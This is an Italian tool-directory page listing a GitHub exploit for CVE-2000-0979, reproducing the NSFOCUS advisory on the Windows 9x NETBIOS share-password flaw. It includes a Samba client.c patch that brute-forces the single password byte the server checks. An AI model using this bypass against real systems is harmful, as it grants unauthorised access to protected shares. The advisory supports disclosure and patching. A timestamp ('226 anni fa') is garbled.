Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
Strumenti/GitHubGitHub/z6543/cve-2000-0979
Framework di ExploitAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration Testing
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

Vedi Repository
226 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2000-0979

CVE-2000-0979.rb è lo strumento autonomo per sfruttare la CVE-2000-0979 contro il servizio SMB di Windows 95.

msf_2000_0979.rb è il modulo Metasploit. Puoi copiarlo in ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩

MSF module

Ulteriore documentazione in arrivo!

Avviso originale

NSFOCUS Security Advisory(SA2000-05)

Topic: Vulnerabilità nella verifica della password NETBIOS di Microsoft Windows 9x

Data di rilascio: 24 agosto 2000 Data di aggiornamento: 11 ottobre 2000

Sistemi interessati

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

Sistemi non interessati

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

Impatto

Esiste una vulnerabilità nello schema di verifica della password utilizzato dall'implementazione del protocollo NETBIOS di Microsoft Windows 9x. Questa vulnerabilità consente a qualsiasi utente di accedere al servizio di condivisione file di Windows 9x protetto da password. L'attaccante non deve conoscere la password della condivisione.

Descrizione

È possibile impostare una password per proteggere le risorse condivise del sistema Microsoft Windows 9x. Tuttavia, esiste una vulnerabilità nello schema di verifica della password utilizzato dall'implementazione del protocollo NETBIOS di Microsoft Windows 9x. Per verificare la password, la lunghezza della password dipende dalla lunghezza dei dati inviati dal client al server. In altre parole, se un client imposta la lunghezza della password a un byte e invia il pacchetto con la password in chiaro al server, il server la confronterà solo con il primo byte della password condivisa (in chiaro) e, se corrisponde, il processo di verifica è completato. Tutto ciò che un attaccante deve fare è indovinare e provare il primo byte della password sulla vittima. Anche il sistema di gestione remota di Windows 9x è interessato perché adotta lo stesso metodo di autenticazione tramite password condivisa.

Exploit

Ecco un semplice esempio per dimostrare questo bug. Ottieni il pacchetto sorgente di samba e modifica source/client/client.c in questo modo:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
+*/
+
+        password[0] = 0;
+        c->sec_mode = 0;
+        do{
+
+          password[0]+=1;
+
+        }while(!cli_send_tconX(c, share, "?????", password, 1));

        DEBUG(4,(" tconx ok\n"));

Soluzione alternativa

Chiudi il servizio di condivisione file e stampanti di Microsoft.

Soluzione

Microsoft è stata informata e ha rilasciato un bollettino di sicurezza relativo a questa falla.

Il bollettino è disponibile all'indirizzo :

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

Le patch sono disponibili ai seguenti indirizzi:

. Microsoft Windows 95

Patch disponibile a breve

. Microsoft Windows 98 e 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

Dichiarazione di non responsabilità

LE INFORMAZIONI FORNITE SONO RILASCIATE DA NSFOCUS "COSÌ COME SONO" SENZA ALCUN TIPO DI GARANZIA. NSFOCUS DECLINA OGNI GARANZIA, ESPRESSA O IMPLICITA, ECCETTO LA GARANZIA DI COMMERCIABILITÀ. IN NESSUN CASO NSFOCUS SARÀ RESPONSABILE PER DANNI DI QUALSIASI NATURA, INCLUDENDO DANNI DIRETTI, INDIRETTI, INCIDENTALI, CONSEQUENZIALI, PERDITA DI PROFITTI COMMERCIALI O DANNI SPECIALI, ANCHE SE NSFOCUS È STATA AVVISATA DELLA POSSIBILITÀ DI TALI DANNI. LA DISTRIBUZIONE O LA RIPRODUZIONE DELLE INFORMAZIONI È CONSENTITA A CONDIZIONE CHE L'ADVISORY NON VENGA MODIFICATO IN NESSUN MODO.

?Copyright 1999-2000 NSFOCUS. Tutti i diritti riservati. Termini di utilizzo.

NSFOCUS Security Team [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

Scarica lo strumento